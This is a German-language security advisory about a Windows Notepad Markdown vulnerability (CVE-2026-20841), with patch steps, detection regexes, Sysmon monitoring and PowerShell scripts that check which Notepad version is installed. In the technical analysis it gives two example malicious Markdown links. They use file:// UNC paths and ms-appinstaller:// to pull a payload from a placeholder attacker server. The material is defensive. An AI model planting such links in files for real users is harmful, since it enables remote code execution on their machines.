Am 10. Februar 2026 hat Microsoft eine schwerwiegende Sicherheitslücke im Windows Notepad geschlossen. CVE-2026-20841 ermöglicht es Angreifern, über eine präparierte Markdown-Datei (.md) beliebigen Code auf dem System des Opfers auszuführen. Der CVSS-Score liegt bei 8.8 (High). Proof-of-Concept-Code ist bereits öffentlich verfügbar.
Auf einen Blick
| Eigenschaft | Detail |
|---|---|
| CVE-ID | CVE-2026-20841 |
| CVSS 3.1 | 8.8 (High) / MSRC: 7.8 |
| Typ | Command Injection (CWE-77) |
| Betroffen | Windows Notepad (Store-App) Versionen 11.0.0 bis < 11.2510 |
| Patch | 10. Februar 2026 (Patch Tuesday) |
| KB-Artikel | KB5077181 (Win 11) / KB5075912 (Win 10) |
| Entdecker | Cristian Papa, Alasdair Gorniak (Delta Obscura), „Chen” |
| Exploit-Status | PoC auf GitHub veröffentlicht |
Hintergrund: Notepad wird modern
Drei Jahrzehnte lang war Windows Notepad genau das, was der Name versprach: ein minimalistischer Texteditor ohne jede Ambition. Kein Syntax-Highlighting, kein Rich-Text, keine Netzwerkfunktionen. Genau diese Einfachheit machte Notepad zu einem der vertrauenswürdigsten Programme unter Windows – es konnte schlicht nichts Gefährliches tun.
Ab 2022 begann Microsoft jedoch, Notepad grundlegend zu modernisieren. Die App wurde als Microsoft-Store-App neu aufgesetzt und erhielt nach und nach Tabs, ein überarbeitetes Design und schließlich 2025 die Unterstützung für Markdown-Rendering und anklickbare Links. Diese Funktionserweiterungen brachten Fähigkeiten in einen Texteditor, die zuvor Browsern und Dokumentenviewern vorbehalten waren – und damit auch deren Angriffsfläche.
⚠️ Wichtige Unterscheidung: Betroffen ist die moderne Store-Version von Notepad (ab Windows 11, rückportiert auf Windows 10), nicht das klassische
notepad.exeaus dem System32-Verzeichnis. Die Store-App wird über den Microsoft Store aktualisiert, nicht über Windows Update allein.
Technische Analyse der Schwachstelle
Die technische Analyse basiert auf dem detaillierten Bericht der Zero Day Initiative (TrendAI Research).
Markdown-Erkennung über Dateierweiterung
Wenn Notepad eine Datei öffnet, prüft die Funktion sub_1400ED5D0() anhand eines festen String-Vergleichs, ob die Dateierweiterung .md lautet. Nur diese Erweiterung löst das Markdown-Rendering aus. Standardmäßig sind .md-Dateien zwar nicht Notepad zugeordnet, aber sobald ein Nutzer eine solche Datei manuell in Notepad öffnet, wird der Markdown-Renderer aktiv.
Tokenisierung und Link-Verarbeitung
Der Markdown-Inhalt wird in Tokens aufgesplittet – Überschriften, Text, Links etc. – und Token für Token gerendert. Die Funktion sub_140170F60() ist für die Verarbeitung von Link-Klicks zuständig. Sie filtert den Link-Wert und übergibt ihn anschließend an ShellExecuteExW().
Unzureichende Filterung – die eigentliche Schwachstelle
Das Problem: Die Filterung war unzureichend. Notepad blockierte nicht alle gefährlichen Protokoll-URIs. Insbesondere waren file:// und ms-appinstaller:// nicht gesperrt. Da ShellExecuteExW() die konfigurierten Protokoll-Handler des Systems nutzt, konnten je nach Systemkonfiguration weitere Protokolle ausgenutzt werden.
Zusätzlich wurden doppelte Backslash-Sequenzen (\\) vor der Übergabe an ShellExecuteExW() zu einfachen Backslashes konvertiert, was den Zugriff auf UNC-Pfade (Netzwerkressourcen) ermöglichte.
Markdown unterstützt zwei Link-Formate, die beide ausgenutzt werden konnten:
// Standard-Link:
[Projektdokumentation](file:////attacker-server/share/payload.exe)
// Inline-Link:
<ms-appinstaller://attacker-server/malicious.msix>
CVSS-Vektor im Detail
| Metrik | Wert | Bedeutung |
|---|---|---|
| Attack Vector | Network (NVD) / Local (MSRC) | Zustellung über Netzwerk, Ausführung lokal |
| Attack Complexity | Low | Kein spezielles Setup nötig |
| Privileges Required | None | Kein Zugangsrecht auf dem Zielsystem nötig |
| User Interaction | Required | Opfer muss Datei öffnen + Link klicken |
| Impact (C/I/A) | High / High / High | Vollständige Kompromittierung möglich |
Angriffsvektor & Exploit-Kette
Der Angriff läuft in fünf Schritten ab:
Schritt 1 – Payload-Erstellung: Der Angreifer erstellt eine .md-Datei mit einem präparierten Link über das file:// oder ms-appinstaller:// Protokoll.
Schritt 2 – Zustellung (Social Engineering): Die Datei wird per E-Mail, Dateifreigabe, Download-Link oder Wechselmedium zum Opfer gebracht. Ein Dateiname wie Projektnotizen.md oder Meeting_Notes.md wirkt dabei völlig harmlos.
Schritt 3 – Opfer öffnet die Datei in Notepad: Notepad erkennt die .md-Erweiterung und aktiviert automatisch das Markdown-Rendering. Links werden als klickbare Elemente dargestellt.
Schritt 4 – Klick auf den Link (Ctrl+Klick): Das Opfer klickt den vermeintlich harmlosen Link. Notepad übergibt den URI ungefiltert an ShellExecuteExW() – ohne Sicherheitswarnung.
Schritt 5 – Code-Ausführung: Windows führt den Protokoll-Handler aus. Eine Remote-Datei wird geladen und im Sicherheitskontext des Benutzers ausgeführt. Bei Admin-Rechten: vollständige Systemkompromittierung.
🎯 Warum Social Engineering hier besonders effektiv ist: Markdown-Dateien (.md) galten historisch als reines Textformat ohne Ausführungsrisiko. Nutzer und selbst erfahrene Administratoren ordnen
.md-Dateien nicht in die gleiche Risikokategorie ein wie.exe,.batoder Office-Dokumente mit Makros. Genau diese falsche Sicherheitsannahme macht den Angriff so gefährlich.
Auswirkungen bei erfolgreicher Exploitation
Bei erfolgreicher Ausnutzung erbt der Angreifer die vollständigen Berechtigungen des angemeldeten Benutzers:
| Auswirkung | Beschreibung | Schwere |
|---|---|---|
| Datendiebstahl | Zugriff auf lokale Dateien, Netzwerkfreigaben, Datenbanken | Kritisch |
| Malware-Installation | Persistente Backdoors, Ransomware, Keylogger | Kritisch |
| Credential-Zugriff | Auslesen gespeicherter Zugangsdaten, Token, Zertifikate | Kritisch |
| Lateral Movement | Ausbreitung im Netzwerk über die gekaperte Sitzung | Hoch |
| Privilegieneskalation | Bei Admin-Rechten des Opfers: vollständige Systemkontrolle | Kritisch |
Timeline
| Zeitpunkt | Ereignis |
|---|---|
| 2025 | Microsoft führt Markdown-Rendering in Windows Notepad ein |
| vor Feb. 2026 | Entdeckung durch Cristian Papa, Alasdair Gorniak und „Chen”, verantwortungsvolle Meldung an Microsoft |
| 10. Feb. 2026 | Microsoft veröffentlicht den Patch im Rahmen des Patch Tuesday (KB5077181 / KB5075912) |
| 19. Feb. 2026 | Zero Day Initiative / TrendAI Research veröffentlicht technische Analyse |
| Feb. 2026 | Proof-of-Concept-Exploit auf GitHub veröffentlicht |
Patch & Behebung
Die Behebung erfolgt über zwei Wege:
1. Windows Update: KB5077181 für Windows 11 bzw. KB5075912 für Windows 10 – über die reguläre Windows-Update-Infrastruktur.
2. Microsoft Store: Update der Notepad-App auf Build 11.2510 oder höher.
⚠️ Achtung – Store-Updates können deaktiviert sein: In Unternehmensumgebungen sind automatische Microsoft-Store-Updates häufig über GPO deaktiviert oder eingeschränkt. In diesen Fällen muss das Notepad-Update gezielt ausgerollt werden. Prüfen Sie die aktuelle Notepad-Version in Ihrer Umgebung!
Der Patch implementiert zusätzliche Validierungsprüfungen für Markdown-Inhalte und beschränkt die erlaubten Protokolle auf HTTP(S) und lokale Dateien. Für nicht-HTTP(S)-Links wird nun eine explizite Benutzerbestätigung angefordert, bevor ein Protokoll-Handler aufgerufen wird. Zusätzlich wurden Sandboxing-Verbesserungen an der Rendering-Engine vorgenommen.
Erkennung & Monitoring
SIEM-Regeln
Überwachen Sie, ob notepad.exe Child-Prozesse startet, insbesondere Shell-Prozesse wie cmd.exe, powershell.exe oder mshta.exe. Ein Texteditor, der Prozesse spawnt, ist grundsätzlich verdächtig.
Netzwerk-Erkennung (IDS/IPS)
Die Zero Day Initiative empfiehlt, den Netzwerkverkehr auf die Übertragung von .md-Dateien zu überwachen und deren Inhalt auf verdächtige Protokoll-URIs zu prüfen. Folgende Regex-Muster erkennen die bekannten Exploit-Varianten:
# Erkennung von file://-Exploits in Markdown-Dateien:
(\x3C|\[[^\x5d]+\]\()file:(\x2f|\x5c\x5c){4}
# Erkennung von ms-appinstaller://-Exploits:
(\x3C|\[[^\x5d]+\]\()ms-appinstaller:(\x2f|\x5c\x5c){2}
Defender-Schutz
Microsoft hat die Defender-Signaturen aktualisiert, um präparierte .md-Dateien zu erkennen und zu blockieren – auch auf Systemen, die den Patch noch nicht installiert haben.
PowerShell: Notepad-Version prüfen & absichern
Notepad-Version lokal prüfen
# Aktuelle Notepad Store-App Version ermitteln
$notepadApp = Get-AppxPackage -Name "Microsoft.WindowsNotepad" -ErrorAction SilentlyContinue
if ($notepadApp) {
$version = [Version]$notepadApp.Version
$patchedVersion = [Version]"11.2510.0.0"
if ($version -ge $patchedVersion) {
Write-Host "[OK] Notepad $version ist gepatcht." -ForegroundColor Green
} else {
Write-Host "[WARNUNG] Notepad $version ist VERWUNDBAR! Update erforderlich." -ForegroundColor Red
}
} else {
Write-Host "[INFO] Moderne Notepad Store-App nicht installiert." -ForegroundColor Yellow
}
Notepad-Version auf Remote-Systemen prüfen (Active Directory)
# Remote-Prüfung auf mehreren Systemen
$computers = Get-ADComputer -Filter "OperatingSystem -like '*Windows 1*'" |
Select-Object -ExpandProperty Name
$results = foreach ($computer in $computers) {
try {
$session = New-PSSession -ComputerName $computer -ErrorAction Stop
$notepad = Invoke-Command -Session $session -ScriptBlock {
Get-AppxPackage -Name "Microsoft.WindowsNotepad" -ErrorAction SilentlyContinue |
Select-Object Name, Version
}
Remove-PSSession $session
[PSCustomObject]@{
Computer = $computer
Version = $notepad.Version
Status = if ([Version]$notepad.Version -ge [Version]"11.2510.0.0") {
"Gepatcht"
} else {
"VERWUNDBAR"
}
}
} catch {
[PSCustomObject]@{
Computer = $computer
Version = "N/A"
Status = "Nicht erreichbar"
}
}
}
$results | Format-Table -AutoSize
$results | Export-Csv -Path "C:\Temp\Notepad_CVE-2026-20841_Status.csv" -NoTypeInformation -Encoding UTF8
EventLog-Monitoring: Notepad spawnt verdächtige Prozesse (Sysmon)
# Sysmon Event ID 1 (Process Create) überwachen:
# Notepad als Parent-Prozess für Shells erkennen
$suspiciousChildren = @(
"cmd.exe", "powershell.exe", "pwsh.exe",
"mshta.exe", "wscript.exe", "cscript.exe"
)
Get-WinEvent -LogName "Microsoft-Windows-Sysmon/Operational" -FilterXPath "*[System[EventID=1]]" |
Where-Object {
$_.Properties[20].Value -match "notepad" -and
$suspiciousChildren -contains (Split-Path $_.Properties[4].Value -Leaf)
} |
Select-Object TimeCreated,
@{N="ChildProcess"; E={$_.Properties[4].Value}},
@{N="CommandLine"; E={$_.Properties[10].Value}},
@{N="User"; E={$_.Properties[12].Value}} |
Format-List
Sofortmaßnahmen-Checkliste
Die folgenden Maßnahmen sollten Administratoren zeitnah umsetzen:
- ☐ February 2026 Patch Tuesday Updates installieren (KB5077181 / KB5075912)
- ☐ Notepad Store-App auf Version 11.2510+ aktualisieren (Microsoft Store prüfen)
- ☐ Notepad-Version auf allen verwalteten Systemen per PowerShell verifizieren
- ☐ Microsoft Store Auto-Update-Richtlinie in GPO prüfen und ggf. aktivieren
- ☐ SIEM-Regel erstellen: Alert bei
notepad.exeals Parent-Prozess für Shells - ☐ E-Mail-Filter für
.md-Dateianhänge verschärfen oder blockieren - ☐ Windows Defender Attack Surface Reduction (ASR) Regeln für Code-Injection aktivieren
- ☐ Benutzer über das Risiko von
.md-Dateien aus unbekannten Quellen informieren - ☐ Bis zum Patch: Alternative Texteditoren für Markdown verwenden (VS Code, Notepad++)
Einschätzung & Lessons Learned
CVE-2026-20841 ist weit mehr als ein typischer „Patch-and-Move-On”-Bug. Die Schwachstelle illustriert ein grundlegendes Problem der modernen Softwareentwicklung: Jedes neue Feature erweitert die Angriffsfläche.
Notepad war jahrzehntelang sicher, weil es nichts konnte. Die Ergänzung von Markdown-Rendering, anklickbaren Links und Netzwerkfunktionalität verwandelte einen passiven Texteditor in eine aktive Anwendung mit Parser-, Rendering- und Protokoll-Handling-Logik – Funktionen, die in Browsern seit Jahren gehärtet werden und trotzdem regelmäßig Schwachstellen aufweisen.
Vier Kernaussagen für IT-Verantwortliche:
1. Built-in ≠ sicher: „Vertrauenswürdige” Built-in-Anwendungen verdienen die gleiche Sicherheitsüberprüfung wie jedes andere Programm, sobald sie neue Fähigkeiten erhalten.
2. Store-Apps als blinder Fleck: Store-Apps können in Unternehmen unbemerkt veralten, wenn automatische Updates deaktiviert sind – ein eigener Patch-Management-Prozess ist nötig.
3. Dateiformate neu bewerten: Die Wahrnehmung von Dateiformaten als „harmlos” (.md, .txt) ist ein Sicherheitsrisiko, das durch Awareness-Schulungen adressiert werden muss.
4. Defense-in-Depth: Netzwerkerkennung, Endpoint-Monitoring und Benutzerschulung wirken zusammen gegen solche Angriffe. Kein einzelner Layer reicht aus.
Die Community-Reaktion auf die Schwachstelle war dementsprechend kritisch. Viele Stimmen hinterfragen, ob Notepad überhaupt Netzwerkfunktionen und KI-Integration (Copilot) benötigt. Mit der Ankündigung, dass Notepad demnächst auch Bilder einbetten können soll, dürften weitere Diskussionen über die Balance zwischen Funktionalität und Sicherheit folgen.
Quellen & Referenzen
- Microsoft Security Advisory (MSRC) – CVE-2026-20841
- NVD / NIST – CVE-2026-20841
- Zero Day Initiative – Technische Analyse
- Help Net Security – Notepad Markdown RCE
- SOC Prime – Detection Content & Analyse
- TechRepublic – Critical Windows Notepad Flaw
- WinBuzzer – Patch Details
- Proof-of-Concept auf GitHub
Veröffentlicht am 23. Februar 2026 von IT-Service Walter. Alle Angaben ohne Gewähr.